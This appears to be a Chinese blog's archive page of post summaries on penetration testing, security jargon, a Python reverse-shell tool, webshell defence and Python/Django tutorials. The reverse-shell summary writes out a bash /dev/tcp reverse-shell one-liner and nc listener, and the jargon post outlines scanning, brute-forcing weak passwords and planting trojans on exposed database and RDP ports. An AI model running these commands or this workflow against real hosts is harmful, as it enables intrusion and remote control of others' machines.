2019年5月6日
渗透流程
摘要: 渗透流程了解什么是渗透?渗透就是模拟黑客攻击找到企业程序中的漏洞。时间、耐心、细心、精力集中 渗透也分为几类:白帽子,查找企业漏洞提交修复。黑帽黑客,这类人可能有背景或者其它利益相关会,查找漏洞并且深入获取信息。 常规渗透 保密协议,找到漏洞不能发出来针对性目标测试, 对某一性的针对测试指定范围测试 阅读全文
posted @ 2019-05-06 18:19 H·c 阅读(245) 评论(0) 推荐(0) 编辑
安全术语
摘要: 肉鸡、抓鸡 抓鸡 指通过扫描弱口令,爆破,漏洞自动化种马 达到控制机器 端口1433 抓鸡 sqlserver 流程:网段扫描端口,进行爆破弱密码,下载木马3389 抓鸡3306 抓鸡 木马分类计算机木马,网页木马大马,小马,一句话木马 webshell以asp、php、jsp或者cgi 等网页文件 阅读全文
posted @ 2019-05-06 17:10 H·c 阅读(790) 评论(0) 推荐(0) 编辑
2019年4月24日
以Python写的 反弹工具
摘要: python 反弹shell 我们知道,一般的反弹shell 可以直接使用 base 反弹 bash -i >& /dev/tcp/ownip/port 0>&1 还可以使用一些简单的命令 nc nmap 等等。。。。 nc -l -p port -vv xxx 经过前几次的攻击,他也变聪明了,知道 阅读全文
posted @ 2019-04-24 11:43 H·c 阅读(345) 评论(0) 推荐(0) 编辑
提供远程的webshell
摘要: 之前网站被黑挂了马 很恶心 本人能力有限, 漏洞太多, 补不过来,网站经常被 黑客进来玩过家家。 被逼无奈之下 还好我发开了一整套的监控维护脚本系统 只要你敢上传, 即上传即失效 唉,废话不多少,来看脚本 这B 竟然再我的 /tmp/ 目录下上了个 伪装的类似安全证书的东西。一般你不细看 ,还是真的 阅读全文
posted @ 2019-04-24 11:29 H·c 阅读(367) 评论(0) 推荐(0) 编辑
Python 面向对象,类的属性和 类的方法
摘要: 面向对象,类的属性和 类的方法 面向对象 面向过程和面向对象 面向过程 和 面向对象 编程 类和对象类和对象:是面向对象中的两个重要概念1.类: 是对事物的抽象,比如:人类,球类2.对象:是类的一个实例,比如:足球,篮球 实例说明:球类可以对球的特征和行为进行抽象,然后可以实例化一个真实的球实体出来 阅读全文
posted @ 2019-04-24 10:45 H·c 阅读(1655) 评论(0) 推荐(1) 编辑
Python 函数
摘要: 函数 函数就是完成特定功能的一个语句组,这组语句可以作为一个单位使用,并且给它取一个名 可以通过函数名在程序的不同地方多次执行(通常叫函数调用) 预定义函数:可以直接使用 自定义函数:自己编写 为什么使用函数降低编程难度通常将一个复杂的大问题,分解成一系列的小问题,然后将小问题,然后将小问题划分成更 阅读全文
posted @ 2019-04-24 10:43 H·c 阅读(307) 评论(0) 推荐(0) 编辑
2019年4月23日
Python 小试牛刀
摘要: 练一练 统计系统内存 统计系统内存free 命令等同于查看系统文件 cat /proc/meminfo 需要两个重要的方法line.startswith('字符串') #找开头符合这个字符串的进行判断,返回布尔值 help(line.startswith())查看帮助 举例: line.split( 阅读全文
posted @ 2019-04-23 18:26 H·c 阅读(223) 评论(0) 推荐(0) 编辑
Python 流程控制
摘要: Python 流程控制条件 if if ... elif ... else if语句if expression: #expression 关键字statement(s) 注:python 使用缩进作为其语句分组的方法,建议使用4个空格 not 即为非1 > 2 是不成立的false ,前面加了not 阅读全文
posted @ 2019-04-23 18:22 H·c 阅读(153) 评论(0) 推荐(0) 编辑
Python
摘要: Python 入门到入狱 Python 安装centos 6Linux 系统自带 python 2.6centos 7Linux 系统自带 python 2.7 python -V #查看版本 windowns 需要手动安装,和一般软件安装没有区别,一直下一步下一步。默认在C盘下的python2.X 阅读全文
posted @ 2019-04-23 18:20 H·c 阅读(582) 评论(0) 推荐(0) 编辑
CMDB - ModelForm
摘要: CMDB - ModelForm 当我们写的页面越来越多,需要的增删改查查的页面就会成倍增长。为了解决这个重复搬无用砖的问题,在django 的admin源码理由,就有一个可以套用复写的方法自动发现功能在urls.py里admin自带的一个源码 manage.pydjango对象网络编程时用到了一个 阅读全文
posted @ 2019-04-23 18:14 H·c 阅读(166) 评论(0) 推荐(0) 编辑